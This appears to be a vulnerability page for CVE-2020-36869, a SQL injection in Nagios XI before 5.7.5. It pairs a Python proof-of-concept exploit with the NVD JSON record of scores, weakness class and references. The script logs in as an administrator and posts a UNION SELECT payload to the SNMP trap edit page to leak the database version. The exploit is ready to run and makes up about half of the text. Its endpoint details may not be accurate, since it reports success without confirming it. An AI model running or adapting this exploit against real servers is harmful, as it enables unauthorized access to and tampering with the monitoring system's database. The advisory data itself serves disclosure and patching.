CVE-2020-36869

# CVE-2020-36869 Nagios XI SQL Injection PoC # Target: Nagios XI < 5.7.5 # Vulnerability: SQL Injection in SNMP Trap Interface Edit Page import requests import sys from urllib.parse import urlencode # Disable SSL warnings requests.packages.urllib3.disable_warnings() TARGET_URL = "https://target-server/nagiosxi/" USERNAME = "admin" PASSWORD = "password" def exploit_sqli(target_url, username, password): """ SQL Injection PoC for CVE-2020-36869 This demonstrates extracting database version information """ session = requests.Session() # Step 1: Login to Nagios XI login_url = f"{target_url}login.php" login_data = { 'username': username, 'password': password, 'loginButton': 'Login' } try: response = session.post(login_url, data=login_data, verify=False, timeout=30) if 'login' not in response.url.lower(): print("[+] Login successful!") else: print("[-] Login failed!") return False # Step 2: Navigate to SNMP Trap Interface Edit Page snmp_url = f"{target_url}includes/components/ccm/?cmd=modify&type=snmp_trap" response = session.get(snmp_url, verify=False, timeout=30) # Step 3: Inject malicious SQL payload # SQL Injection payload to extract database version inject_url = f"{target_url}includes/components/ccm/?cmd=modify&type=snmp_trap" # SQL Injection via trap var_name parameter sqli_payload = "' UNION SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" inject_data = { 'trap_id': '1', 'var_name': sqli_payload, 'submit': 'Save' } response = session.post(inject_url, data=inject_data, verify=False, timeout=30) if '5.' in response.text or 'MariaDB' in response.text or 'MySQL' in response.text: print("[+] SQL Injection successful! Database info leaked.") print("[+] Vulnerability confirmed for CVE-2020-36869") return True else: print("[*] SQL Injection payload sent, check manually for results") return True except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False if __name__ == "__main__": print("="*60) print("CVE-2020-36869 Nagios XI SQL Injection PoC") print("="*60) if len(sys.argv) > 1: TARGET_URL = sys.argv[1] exploit_sqli(TARGET_URL, USERNAME, PASSWORD)

{"cve": {"id": "CVE-2020-36869", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:39.967", "lastModified": "2025-11-05T18:23:07.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios XI versions prior to 5.7.5 contain a SQL injection vulnerability in the SNMP Trap Interface edit page. Exploitation requires an account with administrative privileges to access the affected interface. A user with administrative access could supply crafted input that is not properly sanitized, allowing SQL injection that may lead to unauthorized disclosure or modification of application data or execution of arbitrary SQL commands against the backend database."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.7.5", "matchCriteriaId": "475D740F-21D1-4901-BC99-0FD828109771"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-xi/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/nagios-xi-sqli-via-snmp-trap-interface-edit-page", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}